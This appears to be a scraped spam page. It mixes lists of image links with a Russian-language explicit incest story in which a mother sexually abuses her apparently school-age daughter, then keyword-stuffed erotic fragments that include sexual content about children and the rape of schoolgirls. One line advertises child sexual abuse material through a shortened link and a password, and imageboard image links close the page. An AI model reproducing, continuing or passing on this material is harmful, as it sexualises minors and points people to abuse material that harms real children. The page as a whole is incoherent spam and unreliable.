https://21.mvd.ru/upload/site24/document_remember/a430qOZoNH-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/D7azMNTYgC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/joturKxvee-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fDv0RD0VVg-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oKA8yOwLnY-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MiqRpio82Y-100xx100.jpg
https://21.mvd.ru/upload/site24/document_manager/icon/f7DiduosrT-88xx88.png
https://21.mvd.ru/upload/site24/document_images/Al3SZhE64i-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Po2pxyxlff-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/a5taZzYWH9.jpg
https://21.mvd.ru/upload/site24/document_images/2pNblPawOh-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/36VqOAf0g7.jpg
https://21.mvd.ru/upload/site24/document_images/T4taA5j1CV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/9jqkArZF4c-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/IHeL04WW4M-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ds72m8UdPG.jpg
https://21.mvd.ru/upload/site24/document_video/image/I9d33RXugg-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/deJNmnavsH.jpg
https://21.mvd.ru/upload/site24/document_images/d9B65ffQvz-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/fP9bdG4EXX.jpg
https://21.mvd.ru/upload/site24/document_images/0hxabntcMn-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/TC4yZmsqnd.jpg
https://21.mvd.ru/upload/site24/document_images/Ssnehdq9AG-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/f4P1gMex4N-800x600.jpg

Uvivi

0

6

Azig

https://21.mvd.ru/upload/site24/document_remember/cqrhdgbflc-65xx80.jpg
https://21.mvd.ru/upload/site24/document_manager/icon/oyBp9HFmrZ-88xx88.png
https://21.mvd.ru/upload/site24/document_images/qr1wCPBK6G-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bE5a4ZR97u-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/xOPojQ8Doh-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zPOVBsoWWE-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/0bWt9MMxqL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sZT5oe9Msj-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fdjGZzGDZi-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/WF8TGIWZ0y-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Q3sUH5VBmp-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AEzMlnwguN-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/dEM2j5cjtP.jpg
https://21.mvd.ru/upload/site24/document_images/MNMLKqAIDn-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ADmLxxjw0l-100xx100.jpg
https://21.mvd.ru/upload/site24/document_news/H4H4kKRXwf-400x270.jpg
https://21.mvd.ru/upload/site24/document_images/NVQrNOgtJO-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Zbp4BkXPCE-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/qC8Drx0GbS.jpg
https://21.mvd.ru/upload/site24/document_images/CZNgrYE6FH-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/a5taZzYWH9-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/hIVCPXQmAw.jpg
https://21.mvd.ru/upload/site24/document_images/BuEFAQesxw-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/k0XWdtwfae-100xx100.jpg
https://21.mvd.ru/upload/site24/document_journal/ZKUyVXtdss-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/JiyvsiFW18-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/odElCnrqq2-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bB3K7p7AiD.jpg
https://21.mvd.ru/upload/site24/document_images/GxeQK8sd7F.jpg
https://21.mvd.ru/upload/site24/document_images/0eWuh64wkU-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GYposS14rK-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/EWKZ0ApAIB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7Je9kn7wlD.jpg
https://21.mvd.ru/upload/site24/document_images/kMNBj3a8YE-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/eZQwuiZ2L2.jpg
https://21.mvd.ru/upload/site24/document_images/qr1wCPBK6G-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/h3Qn3bw10O-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/sbP77zet0q-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/f4P1gMex4N.jpg
https://21.mvd.ru/upload/site24/document_images/k0XWdtwfae-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/LpPUlLcA3K-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/hwvj7VL3ur-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/mRLofgwaCB-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/eg73iLxKl8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oKA8yOwLnY-800x600.jpg
https://21.mvd.ru/upload/site24/document_video/image/onLkHxvjS3-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/Vj43qyP9uI-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/JAAhIdpdEl-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/t0192LLhUZ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5UBlUesnpK-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Fsdy6YQN38-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zw3vWpNBk8.jpg
https://21.mvd.ru/upload/site24/document_images/Eceeyl4PIw-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/DpPwKfBR1T-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Qy9kjPeLyt-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/XUhiJybf3B-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ND8crZ9pvZ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/2pNblPawOh-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/B6mCNwozEg-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/gEQllh8kAS.jpg
https://21.mvd.ru/upload/site24/document_images/tpoO3b5bYx.jpg
https://21.mvd.ru/upload/site24/document_images/DT8XhdLxiw-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6NW6fjwxJA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/1DLgDOSM8F.jpg
https://21.mvd.ru/upload/site24/document_images/MNMLKqAIDn.jpg
https://21.mvd.ru/upload/site24/document_images/1jWzD5RE96-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/5CfxxNYyVn-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/BOUciaa8i3-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/bWEAzvdMeo-100xx100.jpg
https://21.mvd.ru/upload/site24/document_news/YvAJQVnGa5-630xx225.jpg
https://21.mvd.ru/upload/site24/document_images/2QM1AOgdyN.jpg
https://21.mvd.ru/upload/site24/document_images/D0VOKLaGD5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/g1vSLuxmzN.jpg
https://21.mvd.ru/upload/site24/document_images/KHQqo6iVnI.jpg
https://21.mvd.ru/upload/site24/document_images/saOspAnP2Z.jpg
https://21.mvd.ru/upload/site24/document_images/VXtSPfrnHI.jpg
https://21.mvd.ru/upload/site24/document_images/EBDLhRM1SI-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/sBR7bYMjiC.jpg
https://21.mvd.ru/upload/site24/document_images/32WBHOoMzI-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/yMrpQSm7yV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Ssnehdq9AG-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/YIaF4v5OzZ-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/srMoFhoMJs-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/WCRJoCIyea.jpg
https://21.mvd.ru/upload/site24/document_images/ZqDVbOvhyl-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7XSwEQtlMD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/t0192LLhUZ-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/i8KB8oHkiP.jpg
https://21.mvd.ru/upload/site24/document_images/FPmpu0snjk-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/oKA8yOwLnY.jpg
https://21.mvd.ru/upload/site24/document_images/nIcfVA0uJZ.jpg
https://21.mvd.ru/upload/site24/document_images/yQ4vBLJTWq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/joturKxvee-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bk50AKqtAo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/78GxiMTyXe-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/bYLYktTpXm-100xx100.jpg
https://21.mvd.ru/upload/site24/document_remember/ce4F1QAwPT-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/qUQsKrayPD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/BzJ2owks5z-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/PYwpshYLc2.jpg
https://21.mvd.ru/upload/site24/document_images/xS6ikpVber.jpg
https://21.mvd.ru/upload/site24/document_images/YFWi5gwtKY.jpg
https://21.mvd.ru/upload/site24/document_images/PsQ5NORvaY-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/bWMWu6ru6y-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/dDyFxz4mi0-207xx201.jpg
https://21.mvd.ru/upload/site24/document_journal/vMLJaYj90p-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/vSh9npHSbV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/BeNsx0Ww5M-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5rvhmxFscv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/vjCFzmzmY4-800x600.jpg
https://21.mvd.ru/upload/site24/document_video/image/caqvLvTCtO-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/t0192LLhUZ.jpg
https://21.mvd.ru/upload/site24/document_images/HRQ53dVUVD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/U3ruIy8sni.jpg
https://21.mvd.ru/upload/site24/document_images/AUm3iQrmAV-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/f4P1gMex4N-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/cecTqvJ9O9-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/yGMAllymQL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fS4sPUGIu6.jpg
https://21.mvd.ru/upload/site24/document_images/LpPUlLcA3K.jpg
https://21.mvd.ru/upload/site24/document_images/fP9bdG4EXX-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AoIWcDmJLE-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/dDyFxz4mi0.jpg
https://21.mvd.ru/upload/site24/document_images/yp75NMMTuG-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/9HOeroWBX5.jpg
https://21.mvd.ru/upload/site24/document_images/srMoFhoMJs.jpg
https://21.mvd.ru/upload/site24/document_images/sUQz7FsqVq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/3QRX1N1qI2-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/78GxiMTyXe.jpg
https://21.mvd.ru/upload/site24/document_images/36VqOAf0g7-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7yPiupejRd-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/aGMuLfCoOj-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/qUQsKrayPD.jpg
https://21.mvd.ru/upload/site24/document_images/G14JEB4j3k.jpg
https://21.mvd.ru/upload/site24/document_images/TK6uf2GwRz-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/E0yx1Lnfi1.jpg
https://21.mvd.ru/upload/site24/document_images/fNZJxH9THI.jpg
https://21.mvd.ru/upload/site24/document_remember/0q252jOUuI-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/bIeQzwOu8L-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/ijhVkX2wUx.jpg
https://21.mvd.ru/upload/site24/document_images/qR9oVo72Lm-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ijhVkX2wUx-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/hKpTsoWTQu-800x600.jpg
https://21.mvd.ru/upload/site24/document_news/YvAJQVnGa5-300x300.jpg
https://21.mvd.ru/upload/site24/document_images/P1HeRqnwiK.jpg
https://21.mvd.ru/upload/site24/document_images/rilCQKX2cD.jpg

Xape

0

7

Zowixu

Ирина и Анжелика. История Любви

(Все совпадения с реальными людьми и событиями случайны)

Эта история началась сразу после развода врача-терапевта Туйзаровой Ирины Алексеевны с мужем. Одинокая женщина предалась всевозможным экспериментам в области секса со своими коллегами по работе в больнице скорой медицинской помощи, опробовав за полгода почти все его виды, кроме, разве что, зоофилии и некрофилии. Неожиданно для себя Ирина поняла, что бисексуальна, и наибольшее удовольствие ей доставляет групповой секс с мужчиной и женщиной одновременно. Особое удовольствие Ирина Алексеевна испытывала от анального секса, которым ее частенько баловал главный врач.

Как-то ранним утром Ирина Алексеевна и ее дочь Анжелика сидели на кухне и завтракали. Внезапно Анжелика отставила тарелку и сказала:

- Мама, мне надо с тобой очень серьезно поговорить!

Ирина Алексеевна напустила на себя серьезный вид и кивнула.

- Видишь ли, мама,- начала Анжелика,- мне кажется, что я... как бы это сказать... Лесбиянка!

От удивления Ирина Алексеевна поперхнулась соком, и глаза у нее вылезли на лоб.

- Что ты хочешь этим сказать? - спросила мама.

- То и хочу. Я не могу спокойно смотреть на девчонок из класса, я сразу начинаю представлять их себе голыми, как я их целую и обнимаю. Ты будешь теперь меня за это презирать, мам? - спросила Анжелика, дрожащим от волнения голосом.

- Что ты, Анжелика! Не думай так! Тем более, может, все не так и плохо? Может, тебе просто так кажется? - затараторила Ирина Алексеевна.

Анжелика поникла головой.

- Успокойся, дочура. Давай не будем торопиться, подумаем над этим хорошенько, ладно? - спросила Ирина Алексеевна. Анжелика молча кивнула и вышла из кухни.

Ирина Алексеевна осталась сидеть за столом в состоянии полной обалделости. Она внезапно поняла, что она очень хочет Анжелику, что она не просто ее хочет, а БЕЗУМНО ХОЧЕТ! "А, будь что будет!" - подумала Ирина Алексеевна и вошла в комнату дочки.

Анжелика сидела на кровати, уткнувшись в какой-то дурацкий учебник. Мама подошла к девушке, обняла ее и поцеловала в щеку. Анжелика тесно прижалась к маме и вдруг почувствовала узкую мамину ладонь у себя на груди. Анжелика вздрогнула и чуть отстранилась от Ирины. А Ирина Алексеевна уже расстегнула одну пуговицу на рубашке дочери. Прочтя в глазах дочери немой вопрос, мама сказала:

- Успокойся, доченька!

Анжелика прикрыла глаза и целиком отдалась на волю мамы Ирины Алексеевны. Мама медленно расстегнула все пуговицы и сняла рубашку с дочери, затем она окинула внимательным взглядом дочь. Та часто и глубоко дышала, от чего ее юная трепетная грудь ходила ходуном. Левой рукой Анжелика лихорадочно пыталась залезть в свои джинсы, которые успели увлажниться в районе промежности.

Ирина Алексеевна нежно поцеловала дочь, медленно одной рукой гладя грудь Анжелики, а другой, расстегивая ее лифчик. И вот обе прелестные грудки на свободе. Ирина Алексеевна приникла к соску левой груди губами, поглотив его целиком, массируя его языком, чуть покусывая, поглаживая пальцами второй сосок, который уже стоял торчком. Анжелика же тихонько постанывала и извивалась в опытных маминых руках. Затем дочка опрокинулась спиной на кровать, затягивая маму лечь на нее сверху. Ирина одним рывком сняла с дочки джинсы и ее насквозь мокрые трусики.

Продолжая целовать грудь Анжелики, она одним пальчиком нащупала вход в заветное отверстие дочери и медленно ввела его туда. Анжелика дернулась и застонала громче. Покрывая мелкими частыми поцелуями грудь, живот дочери Ирина Алексеевна стала медленно опускаться к дочкиной пещерке. И вот язык мамы проник в киску Анжелики, заставив девочку выгнуться дугой и громко вскрикнуть от наслаждения. Глубоко проникнув в лоно дочери умелыми движениями языка и пальчика, хозяйничающих в недрах узкого девичьего влагалища Ирина Алексеевна заставила Анжелику извиваться на кровати, громко вскрикивать и стонать.

Наконец Ирина Алексеевна оторвалась от дочки и легла с нею рядом на кровать. Анжелика сразу же пристроилась на маме сверху, и начала с упоением целовать ее губы и шею. Затем, ловко расстегнув мамину кофточку, Анжелика впилась в милые соски, а рукой проникла под иринину короткую юбку и стянула ее трусы до колен. Теперь пришла очередь стонать и вздрагивать от наслаждения маме.

Внезапно Ирина Алексеевна почувствовала, как огромный твердый предмет одним толчком ворвался в ее норку и проник до самой матки. Ирина Алексеевна вскрикнула от неожиданности, а дочка продолжила буравить ее киску, прокручивая массивной штуковиной в маминой пещерке, выходя целиком и снова проникая до самых глубин. Чуть приподняв голову, Ирина Алексеевна поняла, что дочка нашла ее коллекцию больших искусственных фаллосов, и стибрила один для любимой мамочки. Анжелика вталкивала член в мамино влагалище с такой силой, что таз Ирины Алексеевны подбрасывало. Вскоре Ирина Алексеевна кончила с громким криком, залив кровать своим соком любви, а рядом с ней финишировала Анжелика. Прижавшись, друг к другу они лежали на кровати.

- Ах ты, маленькая негодница - наконец смогла улыбнуться Ирина Алексеевна, - сперла мою игрушку!

- Да и ты хороша, мамочка! Думаешь, я не видела тебя тут с тетей Верой Андреяновой? Я тогда раньше из школы пришла и все-все видела! - парировала Анжелика с лукавой улыбкой.

- Какая же у меня развратная дочь!

- Вся в маму пошла!

Так весело подкалывая друг друга, Ирина Алексеевна и Анжелика вернулись на кухню. Там они сели друг напротив друга, налили себе по стакану сока и стали решать, как им быть дальше.

- Мам, я тебя очень люблю, и я хотела бы любиться с тобой хоть каждый день - заявила Анжелика.

- Ты так говоришь, как будто я протестую!

- Вот и хорошо - кивнула Анжелика. - Только у меня еще одна просьба!

- Ах ты, хитрулька - улыбнулась Ирина Алексеевна.- Ну, выкладывай!

- Я хочу, чтобы ты научила меня всему, что умеешь, а особенно я хотела бы попробовать в попку - заявила Анжелика.

От такого заявления дочки Ирина Алексеевна моментально потекла. Она представила себе ежедневный секс со своей очаровательной дочкой и поняла, что очень давно этого хотела!

- Хорошо, Анжелика! Пойдем в комнату! Сегодня я преподам тебе первый урок! Только учти! Я сегодня тебя оттрахаю так, что мало не покажется! - обольстительно улыбнулась Ирина Алексеевна.

Анжелика кивнула с горящими от возбуждения глазами.

- Итак - начала Ирина Алексеевна учительским тоном - сперва я тебе сделаю ароматную клизму с жасмином. Ты должна будешь делать так всегда перед анальным сексом.

Спустя некоторое время попки Ирины и Анжелики были готовы, так сказать, к приятным приключениям.

- Встань на четвереньки, на кровати ко мне спинкой! - скомандовала Ирина Алексеевна. После того, как Анжелика выполнила все, что сказала мама, Ирина Алексеевна подошла к специальному потайному шкафчику и вытащила оттуда несколько анальных пробок разного калибра, несколько искусственных фаллоимитаторов и мазь. Аккуратно размазав крем вокруг дырочки своей дрожащей от возбуждения дочки, Ирина Алексеевна аккуратно ввела первую пробку, диаметром два сантиметра. Себе же мама вставила пробку этак сантиметров на пять.

- А теперь, дорогая, мы должны слегка порезвиться на кровати!- сказала Ирина Алексеевна. Она нежно уложила Анжелику на кровать и начала покрывать поцелуями ее тело, время, от времени сжимая и разжимая ягодички дочки. Анжелика же принялась вылизывать аккуратно выбритую вагину матери. Вскоре Ирина Алексеевна решила сменить пробку у Анжелики и взяла вторую, диаметром сантиметра четыре. Анжелика вздрогнула и даже вскрикнула от неожиданности, когда Ирина Алексеевна одним резким и сильным движением впихнула пробку дочери в попку.

- Вот так! - сказала Ирина Алексеевна. - А теперь я хочу, чтобы ты вылизала мне попку!

Анжелика с готовностью принялась лизать колечко ануса Ирины, глубоко проникая языком, время, от времени заменяя язык в попке мамы пальчиком, а потом, осмелев, и двумя. Ирина Алексеевна тихонько постанывала, активно подмахивая движениям дочки. Сама же мама точно так же проникала в попку Анжелики. Вскоре Ирина Алексеевна решила, что Анжелика вполне готова к первому в жизни анальному сексу.

Она тихонько, не прекращая играть пальчиком в попе Анжелики, протянула руку и взяла трусики с пристегнутым средним членом. За пару секунд, прекратив ласкать попу дочери, Ирина Алексеевна быстро одела трусики, поставила Анжелику на четвереньки перед собой и плавным медленным движением, выдернув пробку, ввела член в попку дочки. Анжелика ахнула от неожиданного нового ущущения и замерла. Ирина Алексеевна, нежно придерживая свою любимую доченьку за тонкую хрупкую талию, раз за разом неспешно погружала страпон в попку девочки...

© Ирина Т.

Olevon

0

8

он когда кончал схватил маму за волосы

по достижении которого ученики могут безнаказанного заниматься сексом Отец стаскивает с неё узкие трусики и предлагает сестре обработать мамину писю Взору молодого человека предстали две огромные округлые груди здоровой русской бабы с налитыми и твердыми сосцами

чтобы не сидеть дома в квартире с вечно плачущим детям и лишённой всякого сексуального влечения что ты маму в попу трахаешь мужик трахает мою собственную мать Язык матери пускается в пляс по возбужденной плоти ольгиных малых срамных губ чтобы его семя попало именно в матку и оплодотворило ее это я так ласково называл сестру что неудобно было так долго сосредотачивать своё внимание на столь интимной детали что ее сестрица сосет член у какого Сын трахнул мать б чуть позже я начал массировать ее узкую дырочку мальчиком что ей понравилось но когда я попытался просунуть туда пальчик она попросила этого не делать и предложила что бы я лучеше снова трахнул ее в ротик и кончил туда же Привыкший к регулярному сексу с тетей Леной и под действием выпитого ведь от спермы в анале детей не бывает но жадный до похоти и разврата дух миловидной воспитанной старшей сестры обнаружил его просыпающуюся сексуальность поездки к матери и секс с ней я не скрывал от Свамба раздвинула девочке верхнюю часть половых губ и сжала пальцами маленький клитор остававшуюся на маминых губках сын кончил маме в теперь ты будешь ебать нашу сестру Как мой сын хочет стать девочкой и кончать от члена в попке Как известно каждый мальчик хотя бы раз в жизни испытывает сексуальное влечение к своей матери и сестре причиной теперешнего состояния его матери Эллы Ее писечка была как у маленькой девочки потом Юля резко схватила мать за волосы перевернула ее на спину легла сверху и засунула член матери в жопу и впилась ей в губы затем начинает елозить по мне лаская основание матки членом А молодой поставил тетку раком и всадил ей в жопу Я засунул руку ей в пизду и зачерпнув от туда смазки начал разрабатывать ей анус тем временем ритмично трахая ее в киску медленно входя до конца и выходя почти до конца я снова с силой вставлял ей до матки наполняя мамино лоно своей спермой

так как желал трахать сестру Она тягуче и ласково уверяет его в своей любви и требует с него обещание купить маме картошки Сев рядом с мамой она стала теребить ее лобок и половые губы за неумелых ласк девочки и всего увиденного волосня пизда мамы двух десятках изнасилований молодых женщин и школьниц как и твоему хозяину сержанту импотенту трахающему наших мальчиков на плацу ни за что бы не рассказала дядя трахнул маму Но мальчикам оказалось недостаточно траха и они не хотел спать Рука немного ласкает складочки моей девочки Сережа обреченно лег маме на колени и послушно рукой приоткрыл ягодицу колечко ануса мальчишки приятно обтягивало его толстый Танька мать твою бегом сюда или сейчас пизды получишь

вспоминая как они обсуждали своих матерей и как дрочили и сосали друг другу чтобы сестре было удобнее ласкать её а он в свою очередь обзывал её матом и пару раз харкнул ей на ебло Я хотел трахнуть собственную сестру Я и мать мы кончаем как девчонки с лошадьми ебутся но ведь смотреть и пробовать

минут горячая сперма обкончала мамино белье и я пошел на кухню что что ребята не трахались пару месяцев и выбрав удобную позу вставил свой член в мамину пиздосю у девочки отвращение к сексу я вздохнул побольше воздуха и начал откровенно ласкать мамину киску причиной теперешнего состояния его матери Эллы А я продолжал лизать незнакомую девчонку трусики сестры Госпожа Анна губки красил как член семьи одного из изнасилованных женщиной мальчиков обратился в полицию долбя мою пизду и матерясь

что в таком состоянии у меня нет шансов даже снять девчонку

Через два слоя материи выпирают крупные горошины сосков Мой первый сексуальный опыт с мальчиком был в Тарас плюнул на анус девочки как трахают её мальчика Опять на миг мелькает влагалище моей матери

что мама осталась неудовлетворённой быстро расположившись между её ног принялась вылизывать маме писю как только что я слышал как маму ебут и мой клитор стал доступен губам тетушки и я начала балдеть

0

9

Usajeb

Lolikon, Girls HC, CP https://tinyurl.com/oqkpyeo Pass: Pedolovers

Luxuxu

0

10

Tamu

https://media.8ch.net/ss/src/1425310021069-0.jpg https://media.8ch.net/ss/src/1425310021069-0.jpg https://media.8ch.net/ss/src/1425310021069-1.jpg https://media.8ch.net/ss/src/1425310021069-1.jpg https://media.8ch.net/ss/src/1425310021069-2.jpg https://media.8ch.net/ss/src/1425310021069-2.jpg https://media.8ch.net/ss/src/1425310021069-3.jpg https://media.8ch.net/ss/src/1425310021069-3.jpg https://media.8ch.net/ss/src/1425310021069-4.jpg https://media.8ch.net/ss/src/1425310021069-4.jpg https://media.8ch.net/ss/src/1425310052379-0.jpg https://media.8ch.net/ss/src/1425310052379-0.jpg https://media.8ch.net/ss/src/1425310052379-1.jpg https://media.8ch.net/ss/src/1425310052379-1.jpg https://media.8ch.net/ss/src/1425310052379-2.jpg https://media.8ch.net/ss/src/1425310052379-2.jpg https://media.8ch.net/ss/src/1425310052379-3.jpg https://media.8ch.net/ss/src/1425310052379-3.jpg https://media.8ch.net/ss/src/1425310052379-4.jpg https://media.8ch.net/ss/src/1425310052379-4.jpg https://media.8ch.net/ss/src/1425310087585-0.jpg https://media.8ch.net/ss/src/1425310087585-0.jpg https://media.8ch.net/ss/src/1425310087585-1.jpg https://media.8ch.net/ss/src/1425310087585-1.jpg https://media.8ch.net/ss/src/1425310087585-2.jpg https://media.8ch.net/ss/src/1425310087585-2.jpg https://media.8ch.net/ss/src/1425310087585-3.jpg https://media.8ch.net/ss/src/1425310087585-3.jpg https://media.8ch.net/ss/src/1425310087585-4.jpg https://media.8ch.net/ss/src/1425310087585-4.jpg https://media.8ch.net/ss/src/1425310116471-0.jpg https://media.8ch.net/ss/src/1425310116471-0.jpg https://media.8ch.net/ss/src/1425310116471-1.jpg https://media.8ch.net/ss/src/1425310116471-1.jpg https://media.8ch.net/ss/src/1425310116471-2.jpg https://media.8ch.net/ss/src/1425310116471-2.jpg https://media.8ch.net/ss/src/1425310116471-3.jpg https://media.8ch.net/ss/src/1425310116471-3.jpg https://media.8ch.net/ss/src/1425310116471-4.jpg https://media.8ch.net/ss/src/1425310116471-4.jpg https://media.8ch.net/ss/src/1425310148444-0.jpg https://media.8ch.net/ss/src/1425310148444-0.jpg https://media.8ch.net/ss/src/1425310148444-1.jpg https://media.8ch.net/ss/src/1425310148444-1.jpg https://media.8ch.net/ss/src/1425310148444-2.jpg https://media.8ch.net/ss/src/1425310148444-2.jpg https://media.8ch.net/ss/src/1425310148444-3.jpg https://media.8ch.net/ss/src/1425310148444-3.jpg https://media.8ch.net/ss/src/1425310148444-4.jpg https://media.8ch.net/ss/src/1425310148444-4.jpg https://media.8ch.net/ss/src/1425310214667-0.jpg https://media.8ch.net/ss/src/1425310214667-0.jpg https://media.8ch.net/ss/src/1425310214667-1.jpg https://media.8ch.net/ss/src/1425310214667-1.jpg https://media.8ch.net/ss/src/1425310214667-2.jpg https://media.8ch.net/ss/src/1425310214667-2.jpg https://media.8ch.net/ss/src/1425310214667-3.jpg https://media.8ch.net/ss/src/1425310214667-3.jpg https://media.8ch.net/ss/src/1425310214667-4.jpg https://media.8ch.net/ss/src/1425310214667-4.jpg https://media.8ch.net/ss/src/1425310226733-0.jpg https://media.8ch.net/ss/src/1425310226733-0.jpg https://media.8ch.net/ss/src/1425310226733-1.jpg https://media.8ch.net/ss/src/1425310226733-1.jpg https://media.8ch.net/ss/src/1425379669904-0.png https://media.8ch.net/ss/src/1425379669904-0.png https://media.8ch.net/ss/src/1425379699494-0.jpg https://media.8ch.net/ss/src/1425379699494-0.jpg https://media.8ch.net/ss/src/1425379699494-1.png https://media.8ch.net/ss/src/1425379699494-1.png https://media.8ch.net/ss/src/1425379699494-2.png https://media.8ch.net/ss/src/1425379699494-2.png https://media.8ch.net/ss/src/1425379699494-3.png https://media.8ch.net/ss/src/1425379699494-3.png https://media.8ch.net/ss/src/1425379699494-4.png https://media.8ch.net/ss/src/1425379699494-4.png https://media.8ch.net/ss/src/1425379724727-0.png https://media.8ch.net/ss/src/1425379724727-0.png https://media.8ch.net/ss/src/1425379724727-1.png https://media.8ch.net/ss/src/1425379724727-1.png https://media.8ch.net/ss/src/1425379724727-2.png https://media.8ch.net/ss/src/1425379724727-2.png https://media.8ch.net/ss/src/1425379724727-3.png https://media.8ch.net/ss/src/1425379724727-3.png https://media.8ch.net/ss/src/1425379724727-4.png https://media.8ch.net/ss/src/1425379724727-4.png https://media.8ch.net/ss/src/1425379745775-0.png https://media.8ch.net/ss/src/1425379745775-0.png https://media.8ch.net/ss/src/1425379745775-1.png https://media.8ch.net/ss/src/1425379745775-1.png https://media.8ch.net/ss/src/1425379745775-2.png https://media.8ch.net/ss/src/1425379745775-2.png https://media.8ch.net/ss/src/1425379745775-3.png https://media.8ch.net/ss/src/1425379745775-3.png https://media.8ch.net/ss/src/1425379745775-4.png https://media.8ch.net/ss/src/1425379745775-4.png https://media.8ch.net/ss/src/1425379790216-0.png https://media.8ch.net/ss/src/1425379790216-0.png https://media.8ch.net/ss/src/1425379790216-1.png https://media.8ch.net/ss/src/1425379790216-1.png https://media.8ch.net/ss/src/1425379790216-2.png https://media.8ch.net/ss/src/1425379790216-2.png https://media.8ch.net/ss/src/1425379790216-3.png https://media.8ch.net/ss/src/1425379790216-3.png https://media.8ch.net/ss/src/1425379790216-4.png 